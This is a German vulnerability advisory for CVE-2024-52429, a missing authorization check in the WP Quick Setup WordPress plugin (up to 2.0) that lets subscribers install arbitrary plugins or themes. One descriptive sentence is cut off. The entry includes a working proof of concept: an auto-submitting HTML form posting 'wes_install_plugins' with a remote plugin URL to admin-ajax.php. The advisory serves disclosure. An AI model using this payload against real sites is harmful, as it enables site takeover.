
WP Quick Setup <= 2.0 - Fehlende Autorisierung für authentifizierte (Abonnent+) Beliebige Plugin/Theme-Installation
WP Quick Setup <= 2.0 - Fehlende Autorisierung für authentifizierte (Abonnent+) beliebige Plugin/Theme-Installation
Das WP Quick Setup Plugin für WordPress ist anfällig für unbefugte Plugin- und Theme-Installation aufgrund einer fehlenden Berechtigungsprüfung in einer Funktion in allen Versionen bis einschließlich 2.0. Dies macht es
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
Melden Sie sich als Abonnent an und führen Sie dann dieses HTML aus
<html>
<body>
<form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wes_install_plugins" />
<input type="hidden" name="plugin_urls[]" value="https://downloads.wordpress.org/plugin/wdes-responsive-mobile-menu.zip" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>